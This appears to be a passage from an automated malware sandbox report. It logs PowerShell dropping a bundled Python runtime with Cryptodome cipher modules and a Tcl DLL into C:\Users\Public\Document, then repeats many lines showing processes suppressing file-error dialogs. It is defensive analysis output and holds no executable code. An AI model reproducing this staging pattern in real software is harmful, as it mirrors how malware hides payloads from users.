            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\tix8.4.3\tix84.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
